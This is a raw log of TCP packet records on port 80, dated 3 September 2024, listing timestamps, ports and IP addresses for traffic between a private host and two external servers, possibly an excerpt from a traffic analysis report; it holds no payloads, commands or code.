Sep 3, 2024 17:13:21.248162031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248172998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248176098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248189926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248191118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248203039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248214006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248229027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248229027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248229027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248261929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248261929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248425007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248435974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248446941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248456955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248467922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248471975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248471975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248486042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248488903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248498917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248508930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248533010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248533010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248624086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248794079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248805046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248815060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248827934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248837948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248842955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248848915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248853922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248861074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248861074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248898983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248900890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248913050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248945951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249027014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249038935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249048948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249061108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249072075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249073029 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249084949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249087095 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249095917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249108076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249115944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249134064 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249209881 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249392033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249403954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249414921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249425888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249435902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249439001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249439001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249448061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249459028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249469042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249480009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249480009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249480009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249491930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249512911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249512911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249538898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249639034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249650955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.249685049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.249685049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.297950983 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.297969103 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.297981977 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.297991037 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.298002005 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.298012972 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.298027039 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.298059940 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.298074007 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.298775911 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.298868895 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.298875093 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.298880100 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.298891068 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.298907995 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.298933983 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.338732004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.338783979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.338788986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.338797092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.338830948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.338851929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.338902950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.338915110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.338926077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.338937044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.338947058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.338948011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.338960886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339001894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339032888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339044094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339055061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339068890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339076042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339095116 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339123011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339297056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339308023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339318037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339329004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339339018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339349985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339360952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339370012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339370012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339373112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339396000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339406013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339409113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339422941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339447975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339447975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339472055 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339474916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339531898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339559078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339577913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339589119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339596033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339607000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339626074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339637041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339664936 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339795113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339807034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339818001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339828968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339840889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339853048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339857101 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339857101 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339874983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339899063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.339951992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339963913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339975119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.339986086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340003967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340033054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340070009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340081930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340090990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340101957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340115070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340126038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340126038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340126038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340142965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340157032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340168953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340168953 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340183020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340204954 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340225935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340379953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340389967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340399027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340429068 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340449095 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340509892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340523958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340533972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340569973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340584993 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340889931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340900898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340912104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340924978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.340934038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340970039 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.340970039 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.341850042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.341881037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.341888905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.341892004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.341928959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.341964006 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342093945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342106104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342116117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342127085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342133999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342139959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342149019 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342176914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342230082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342241049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342250109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342261076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342272997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342278004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342278004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342284918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342298031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342308044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342322111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342324972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342334032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342338085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342353106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342379093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342379093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342561960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342573881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342582941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342602015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342612982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342621088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342628002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342628002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342633963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342647076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342657089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342667103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342669010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342685938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342686892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342686892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342710018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342724085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.342896938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342907906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.342942953 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343046904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343064070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343072891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343082905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343094110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343103886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343108892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343116045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343122959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343127966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343139887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343152046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343156099 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343163967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343164921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343177080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343189001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343194962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343199968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343210936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343214989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343225002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343226910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343236923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343251944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343255997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343255997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343329906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343641043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343703032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343713999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343734026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343734026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343782902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343799114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343811989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343822956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343823910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343838930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.343848944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343863010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.343902111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.403239965 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.403253078 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.403294086 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.403331995 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.434807062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.434818983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.434828997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.434859037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.434907913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.434914112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.434925079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.434935093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.434945107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.434962988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.434973001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.434983015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.434998989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435024977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435096025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435106039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435116053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435137987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435158014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435158014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435213089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435224056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435235023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435245037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435261011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435267925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435267925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435272932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435276985 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435281038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435286999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435362101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435374975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435379982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435436964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435440063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435455084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435476065 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435520887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435554028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435565948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435576916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435586929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435599089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435605049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435614109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435636044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435636044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435686111 CEST	49730	80	192.168.2.8	52.212.52.84
